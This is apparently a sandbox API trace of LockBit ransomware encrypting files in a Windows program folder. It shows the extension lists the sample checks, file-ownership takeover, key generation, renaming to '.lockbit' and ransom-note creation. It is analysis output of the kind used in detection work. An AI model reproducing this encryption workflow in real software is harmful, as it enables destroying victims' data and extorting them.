lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.166] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.167] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.167] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.167] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.167] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.167] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.167] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.167] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0081.167] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0081.167] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.167] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned=".png" [0081.167] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.167] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.167] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.167] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.168] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.168] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.169] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.169] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png.lockbit") returned 94 [0081.169] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.169] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.170] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.170] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.170] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.170] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.170] RtlFreeAnsiString (AnsiString="\\") [0081.170] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.170] malloc (_Size=0x200) returned 0x77d800 [0081.170] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.170] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.170] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.170] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.171] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.171] CloseHandle (hObject=0x3c4) returned 1 [0081.171] free (_Block=0x77d800) [0081.171] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.172] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.172] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.172] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5088) returned 1 [0081.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.173] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.187] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.187] malloc (_Size=0xd2) returned 0x77d800 [0081.187] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0081.189] free (_Block=0x77d800) [0081.189] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.189] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.190] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.190] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0081.190] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.190] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.190] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0081.190] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.190] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.190] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.190] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.190] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.191] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.191] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.191] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.191] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.191] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.191] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.191] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0081.191] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0081.191] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\") returned="" [0081.191] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0081.192] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.192] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.192] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.192] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 100 [0081.192] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.193] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.193] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.193] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.193] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.193] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.193] RtlFreeAnsiString (AnsiString="\\") [0081.193] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.194] malloc (_Size=0x200) returned 0x77d800 [0081.194] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.194] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.194] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.194] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.194] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.194] CloseHandle (hObject=0x3c4) returned 1 [0081.194] free (_Block=0x77d800) [0081.194] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.194] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.195] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.195] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0081.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.195] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.204] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.205] malloc (_Size=0xde) returned 0x77d800 [0081.205] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xde, FileInformationClass=0xa) returned 0xc0000008 [0081.205] free (_Block=0x77d800) [0081.205] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 1 [0081.205] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt") returned 74 [0081.205] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.205] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbdd476, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fbdd476, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d14a237, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0081.205] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.205] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.205] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0081.205] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.205] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.205] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.206] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.206] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.207] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.207] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.207] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.207] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.207] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.207] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.207] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.207] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0081.207] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0081.207] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD 